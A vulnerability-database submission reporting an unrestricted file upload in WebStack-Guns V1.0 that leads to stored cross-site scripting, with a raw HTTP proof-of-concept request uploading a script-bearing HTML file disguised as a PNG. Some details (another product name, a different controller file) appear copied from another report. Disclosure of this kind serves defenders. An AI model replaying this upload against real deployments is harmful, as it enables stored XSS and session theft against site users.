Submit #580744: jsnjfz WebStack-Guns V1.0 Unrestricted Uploadinfo

Titlejsnjfz WebStack-Guns V1.0 Unrestricted Upload
DescriptionArbitrary File Upload vulnerability in WebStack-Guns allows leads to Stored Cross-Site Scripting via # NAME OF AFFECTED PRODUCT(S) - WebStack-Guns ## Vendor Homepage https://github.com/jsnjfz/WebStack-Guns # AFFECTED AND/OR FIXED VERSION(S) ## submitter - aiyakami,Yveslawtox,luokuang1 ## Vulnerable File - UserMgrController.java ## VERSION(S) - V1.0 ## Software Link - https://github.com/jsnjfz/WebStack-Guns # PROBLEM TYPE ## Vulnerability Type - Arbitrary File Upload → Stored XSS ## Root Cause - The file upload feature in newbee-mall fails to properly validate file content types and extensions (e.g., .svg, .html). Attackers can upload malicious files containing JavaScript code, which are then rendered by victims' browsers, leading to persistent Cross-Site Scripting (XSS). ## Impact - Attackers can upload malicious files disguised as images, which, when rendered by the application or accessed by users, execute arbitrary JavaScript in their browsers. #Successful exploitation can lead to: - Session hijacking (stealing cookies via document.cookie). - Phishing attacks (fake login forms injected via XSS). - Defacement (modifying website content to display false information). - Malware distribution (redirecting users to malicious sites). # DESCRIPTION - During a security review of WebStack-Guns, a critical arbitrary file upload vulnerability was discovered in UploadController.java. The issue arises due to inadequate file validation, allowing attackers to upload malicious files that bypass security checks. # Vulnerability details and POC ## Vulnerability lonameion: - **`UserMgrController.java`** ## Payload: Example: An attacker uploads an html file containing <script>alert(1)</script>, which executes when rendered in a browser. ``` POST /mgr/upload HTTP/1.1 Host: localhost:8000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt0ZgwC0YZBLSexhj Referer: http://localhost:8000/site/site_update/1 sec-ch-ua: "Chromium";v="136", "Google Chrome";v="136", "Not.A/Brand";v="99" Sec-Fetch-Mode: cors Cookie: rememberMe=crk7GATbuIjXmQlYi6/e/yL1QoxhQqjKHa4P/HhiuW1VUIjIuh675SKVojnNV3XQ2rFhYG4mLmETBP964jFEznzP2nIwhEpc60WQfVLKbvEdZKZZZEZMUgBd1JM7BJRnHNWhj90J95+0kT5ImNgCKS0NJX5YiflQZyIe4Ib88Le1qTzAtMUyeNMJhnQ0jvO4hSInxTLq1N7xtcCT8F3bukH7obKaIQO/lANiWmogGvNnAdUpcL56On9wmi6rLQYoMw30JYsNgX0NYwA1YXtomAeFgTYARr8CzgBITUrZk3QJnSvaMunOudF7tWVAH2A1y149oAfgn2UdenQ6HAFkJ3he75BaRE17ZILfcRhSOxccB4F8Ykv9nizaxIuvpWHlpB5n3RNR7WPK2jrKSZeXqcqBFqGxWdrKLaDIs7zhewHPXK4SrW8NMp0v57hm90ZgTGpNtWfcFs5huVJxOlWlZ/GkW9UJihBsGjxISIZmZUGerRSpvU4mpOHb9Sc70aJWNS1ElpbalNMUfqae11ajMayf9l1mTLtg8xziS/DflDbbjWN0nPVpDyhJ+rpFqSEmhzIxFsJ5AL3fmNnP0QCwBZo3APgXiD6qqSGgplydAfWERDOgPYoYjTVpw0NZNebWx/wL5bwomJbTxvNupofObIu9wV6NYsiW7m8DoT6kZTj+eqlEndvdntgBZoq8f/x3OLEQ8JaN/Njn9kDXL5fkcIF/JfZ40tqMqo6LdZmZ5EsqmEi2M4jOk3Q4yxk/y8cl4uxBXNBj0fFiWOHlmJixWL+WKNhEZxq8AyQmddQC37N2BI9RWB577R+wSRnkCg2/zaGW+Mamps++zLEBjEY2ECC/R9nD9FEW8wMTOshv5sGpSC9bLGcfYbUnDzbcHTbDiv9bJWxtVnqRYnKlbzC5/X/ePUtkKOtZNd5tOb/Whk79CB+syPxK74rpOF0a4nzcmmgFHYT1rH0GMdBpPHaNljEU7NfYBM1DbCJbDC/qg8qmpEqNlA/RawPcduYnTucl8tgyBwj0dylBHDhxz1mbsxMXDUtsqSfJAvEjSAyuJFCa5kzQzH0w/MFtgc4v/KIXGeO0CqiI77QCxXY=; shiroCookie=ec0f2e61-5be9-4453-9c76-aeeb13df2842 sec-ch-ua-mobile: ?0 Origin: http://localhost:8000 Sec-Fetch-Site: same-origin Sec-Fetch-Dest: empty sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/x.x.x.x Safari/537.36 Accept-Language: zh-CN,zh;q=0.9 Accept: */* Accept-Encoding: gzip, deflate, br, zstd Content-Length: 747 ------WebKitFormBoundaryt0ZgwC0YZBLSexhj Content-Disposition: form-data; name="id" WU_FILE_3 ------WebKitFormBoundaryt0ZgwC0YZBLSexhj Content-Disposition: form-data; name="name" 2.png ------WebKitFormBoundaryt0ZgwC0YZBLSexhj Content-Disposition: form-data; name="type" image/png ------WebKitFormBoundaryt0ZgwC0YZBLSexhj Content-Disposition: form-data; name="lastModifiedDate" Mon May 19 2025 22:38:28 GMT+0800 (中国标准时间) ------WebKitFormBoundaryt0ZgwC0YZBLSexhj Content-Disposition: form-data; name="size" 25 ------WebKitFormBoundaryt0ZgwC0YZBLSexhj Content-Disposition: form-data; name="file"; filename="2.html" Content-Type: image/png <script>alert(1)</script> ------WebKitFormBoundaryt0ZgwC0YZBLSexhj-- ``` ## The following are screenshots of some specific information obtained from testing and running with the yakit tool: # Suggested repair 1. **Strict File Extension Whitelisting** Only allow safe extensions (e.g., .jpg, .png, .gif) and reject dangerous ones (e.g., .svg, .html, .php).
Source⚠️ https://github.com/Aiyakami/CVE-1/issues/4
User
 aiyakami (UID 85128)
Submission05/19/2025 04:51 PM (11 months ago)
Moderation06/09/2025 08:10 AM (21 days later)
StatusAccepted
VulDB entry311658 [jsnjfz WebStack-Guns 1.0 File Upload UserMgrController.java cross site scripting]
Points20

PreviousOverviewNext

Might our Artificial Intelligence support you?

Check our Alexa App!